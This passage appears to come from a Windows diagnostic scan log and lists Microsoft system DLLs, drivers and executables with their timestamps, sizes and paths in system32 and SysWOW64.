2020-09-15 17:43 - 2020-09-15 17:43 - 000388608 _____ (Microsoft Corporation) C:\WINDOWS\system32\nlasvc.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000387072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShellCommonCommonProxyStub.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000382976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MicrosoftAccountWAMExtension.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000364544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanui.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000357376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntshrui.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000342016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FWPUCLNT.DLL
2020-09-15 17:43 - 2020-09-15 17:43 - 000340992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000337768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000337408 _____ (Microsoft Corporation) C:\WINDOWS\system32\prnntfy.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys
2020-09-15 17:43 - 2020-09-15 17:43 - 000329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dhcpcore.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000328704 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenterprisediagnostics.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000316928 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000316416 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppcomapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000303288 _____ (Microsoft Corporation) C:\WINDOWS\system32\skci.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000303168 _____ (Microsoft Corporation) C:\WINDOWS\system32\LsaIso.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000303104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssvp.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\pnputil.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000299520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Lights.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000297984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincorlib.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000295424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlangpui.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000286720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Search.ProtocolHandler.MAPI2.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000286024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000283648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sppcomapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000283648 _____ (Microsoft Corporation) C:\WINDOWS\system32\pdh.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000282624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\actxprxy.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000278016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\prnntfy.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000275968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.FileExplorer.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000275456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovs.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000272896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppLockerCSP.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000266240 _____ C:\WINDOWS\SysWOW64\Windows.Internal.UI.Shell.WindowTabManager.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000265728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mdmregistration.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000259584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dhcpcore6.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000253952 _____ (Microsoft Corporation) C:\WINDOWS\system32\BitLockerCsp.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000252928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000248832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlancfg.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000248320 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Gpu.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000245760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dialclient.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000244736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pdh.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000242688 _____ (Microsoft Corporation) C:\WINDOWS\system32\ssdpsrv.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000240136 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeManagerObj.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000236544 _____ (Microsoft Corporation) C:\WINDOWS\system32\IndexedDbLegacy.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000235008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmWmiPl.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000233984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000231424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.FileExplorer.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000229376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchFilterHost.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000223744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryUpgrade.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000222720 _____ (Microsoft Corporation) C:\WINDOWS\system32\VideoHandlers.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000217920 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcbloader.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000213344 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000212760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EditionUpgradeManagerObj.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000206848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndiswan.sys
2020-09-15 17:43 - 2020-09-15 17:43 - 000201728 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceSoftwareInstallationClient.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000196768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IPHLPAPI.DLL
2020-09-15 17:43 - 2020-09-15 17:43 - 000190792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxApplicabilityEngine.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000186880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallServiceTasks.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000182272 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvcext.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000178688 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeHelper.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000176440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryClient.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000166272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\omadmapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000165376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssph.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000165376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EditionUpgradeHelper.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000163840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000161792 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorageUsage.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000160768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BitLockerCsp.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000157184 _____ (Microsoft Corporation) C:\WINDOWS\system32\fdWSD.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000153400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sspicli.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000150528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000143872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmAuto.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000141008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Clipc.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000139776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakrathunk.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000138936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000133736 _____ (Microsoft Corporation) C:\WINDOWS\system32\gpapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000132096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srpapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000125016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KerbClientShared.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000119608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadWamExtension.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000117056 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000114176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssitlb.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000113152 _____ (Microsoft Corporation) C:\WINDOWS\system32\fdSSDP.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000113152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\agilevpn.sys
2020-09-15 17:43 - 2020-09-15 17:43 - 000110504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gpapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000110080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rasl2tp.sys
2020-09-15 17:43 - 2020-09-15 17:43 - 000109992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\profapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000109056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GraphicsCapture.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000101888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\raspptp.sys
2020-09-15 17:43 - 2020-09-15 17:43 - 000099640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryBroker.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000099328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontsub.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000098304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlgpclnt.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000097280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Utilman.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000097280 _____ (Microsoft Corporation) C:\WINDOWS\system32\nlaapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000097080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oemlicense.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000096768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000095032 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvservice.sys
2020-09-15 17:43 - 2020-09-15 17:43 - 000092952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32u.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000091648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dtdump.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000091448 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceReactivation.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dot3msm.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dot3api.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000086016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rassstp.sys
2020-09-15 17:43 - 2020-09-15 17:43 - 000073728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dhcpcsvc.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000070144 _____ (Microsoft Corporation) C:\WINDOWS\system32\udhisapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000069728 _____ (Microsoft Corporation) C:\WINDOWS\system32\iumcrypt.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000069432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DeviceReactivation.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\rtutils.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\ssdpapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000067072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EditBufferTestHook.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000066560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSManMigrationPlugin.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000063488 _____ (Microsoft Corporation) C:\WINDOWS\system32\enrollmentapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000062464 _____ (Microsoft Corporation) C:\WINDOWS\system32\edpnotify.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000061952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmRes.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000061752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GameInput.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntlanman.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dhcpcsvc6.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000059904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssprxy.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000053760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rtutils.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000053248 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000049664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msscntrs.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000049152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edpnotify.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000047616 _____ (Microsoft Corporation) C:\WINDOWS\system32\perfctrs.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.Profile.SystemId.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf3216.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\enrollmentapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AssignedAccessRuntime.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000046080 _____ (Microsoft Corporation) C:\WINDOWS\system32\perfproc.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000045056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\perfdisk.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000042496 _____ (Microsoft Corporation) C:\WINDOWS\system32\upnpcont.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000042496 _____ (Microsoft Corporation) C:\WINDOWS\system32\perfos.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000042320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryCore.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\afunix.sys
2020-09-15 17:43 - 2020-09-15 17:43 - 000041472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\perfctrs.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000039424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\perfproc.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\perfdisk.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000037376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsmprovhost.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000036864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wups.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000036864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\perfos.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000035840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSManHTTPConfig.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000034304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000033792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WordBreakers.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000033792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wfdprov.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000030208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cmintegrator.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Drivers\afunix.sys
2020-09-15 17:43 - 2020-09-15 17:43 - 000028160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PCShellCommonProxyStub.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\perfnet.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmAgent.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000023552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\perfnet.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000023552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msacm32.drv
2020-09-15 17:43 - 2020-09-15 17:43 - 000021312 _____ (Microsoft Corporation) C:\WINDOWS\system32\kdhvcom.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000020992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appidtel.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000020480 _____ (Microsoft Corporation) C:\WINDOWS\system32\defragproxy.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000018944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\midimap.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000016384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanhlp.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d8thk.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000012800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d8thk.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000011776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsmplpxy.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000011776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dciman32.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\DMAlertListener.ProxyStub.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000009277 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2020-09-15 17:43 - 2020-09-15 17:43 - 000007680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DMAlertListener.ProxyStub.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000007168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msimg32.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000004096 _____ (Microsoft Corporation) C:\WINDOWS\system32\defragres.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\lpk.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 010847552 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 010336896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 009034752 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 008006248 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 007979416 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 006197760 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 005870496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 005729280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AI.MachineLearning.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 004727296 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 003875840 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 003815424 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 003806720 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 003779384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 003749376 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeContent.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 003587584 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 003505952 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 003384832 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 003303936 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 003181056 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 003082240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 003062784 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 002991416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 002975744 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 002951680 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 002918736 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 002851128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2020-09-15 17:42 - 2020-09-15 17:42 - 002772992 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmSvc.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 002631168 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapGeocoder.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 002587448 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 002451456 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 002422784 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallService.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 002319216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 002259968 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 002248192 _____ (Microsoft Corporation) C:\WINDOWS\system32\ISM.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 002178048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 002131032 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 002023704 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001978656 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcomp.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001866240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbghelp.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001856312 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001825280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001805192 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2020-09-15 17:42 - 2020-09-15 17:42 - 001777152 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001765888 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001701368 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001700352 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowManagement.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001649664 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001538656 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 001530880 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2020-09-15 17:42 - 2020-09-15 17:42 - 001504768 _____ (Microsoft Corporation) C:\WINDOWS\system32\MoUsoCoreWorker.exe
2020-09-15 17:42 - 2020-09-15 17:42 - 001498624 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
